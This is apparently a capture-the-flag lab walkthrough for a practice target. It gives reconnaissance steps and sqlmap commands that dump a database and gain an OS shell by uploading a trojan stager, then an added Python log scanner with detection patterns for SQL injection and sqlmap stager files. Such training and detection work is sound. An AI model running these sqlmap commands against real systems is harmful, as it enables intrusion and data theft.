Fengshentai old shooting range Kali series
2022-06-26 12:23:00 【weixin_ forty-three million four hundred and forty-six thousand】
1. Information gathering: subdomain detection
Download this dictionary: https://hack.zkaq.cn/file/down?id=f80ff6b197c0773b
Then use Layer to scan for subdomains. The subdomain obtained is shop.aqlab.cn.
2. Information gathering: port scanning
Scan shop.aqlab.cn with nmap. The port number obtained is 8001, so the flag is 8001. The previous levels also show that the port number is 8001.
3. Vulnerability scanning: web scanner
Run a directory scan against http://shop.aqlab.cn:8001/. The flag is under robots.txt.
4. Injection testing: sqlmap
The injection point is http://shop.aqlab.cn:8001/single.php?id=1. Use sqlmap to test it.
Get the databases:
python3 sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --dbs
Dump the contents of the tables in the cake database to obtain the flag:
python3 sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 -D cake --dump-all
5. sqlmap --os-shell
Run:
python3 sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --os-shell
The flag.php file cannot be viewed with cmd commands, so choose to upload the Trojan at http://shop.aqlab.cn:8001/tmpupjua.php and obtain the flag.
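From the defender's side, the activity in steps 4 and 5 leaves recognizable traces in the web server's access log. The following is an added example, not part of the original post: it flags sqlmap's default User-Agent, injection patterns in query parameters, and requests to files named like tmpupjua.php (tmpu or tmpb plus four lowercase letters, which is sqlmap's default stager naming). The log lines, IP addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (combined format); IPs are documentation addresses.
SAMPLE_LOG = '''\
203.0.113.7 - - [26/Jun/2022:12:01:10 +0800] "GET /single.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [26/Jun/2022:12:02:11 +0800] "GET /single.php?id=1%20AND%205481%3D5481 HTTP/1.1" 200 5120 "-" "sqlmap/1.6#stable (https://sqlmap.org)"
203.0.113.9 - - [26/Jun/2022:12:02:15 +0800] "GET /single.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- HTTP/1.1" 200 4876 "-" "Mozilla/5.0"
203.0.113.9 - - [26/Jun/2022:12:05:40 +0800] "POST /tmpupjua.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Jun/2022:12:06:02 +0800] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0"
'''

LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
# Common injection fragments, matched after URL decoding.
SQLI = re.compile(r"\b(union\s+(all\s+)?select|sleep\s*\(|benchmark\s*\("
                  r"|into\s+(out|dump)file|and\s+\d+\s*=\s*\d+)", re.I)
# Stager/backdoor file names of the kind --os-shell leaves in the web root.
STAGER = re.compile(r"/tmp[ub][a-z]{4}\.php$")

def classify(line):
    """Return (client_ip, path, [rule names]) for a suspicious line, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, _method, target, _status, ua = m.groups()
    url = urlsplit(target)
    hits = []
    if "sqlmap/" in ua.lower():
        hits.append("sqlmap-user-agent")
    params = parse_qs(url.query, keep_blank_values=True)  # decodes %XX and '+'
    if any(SQLI.search(v) for values in params.values() for v in values):
        hits.append("sqli-in-parameter")
    if STAGER.search(url.path):
        hits.append("sqlmap-stager-file")
    return (ip, url.path, hits) if hits else None

def scan(log_text):
    return [r for r in map(classify, log_text.splitlines()) if r]

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(ip, path, ",".join(hits))
```

The User-Agent rule only catches default settings, so the parameter and file-name rules matter more; a hit on the stager rule means the injection already had file-write access to the web root.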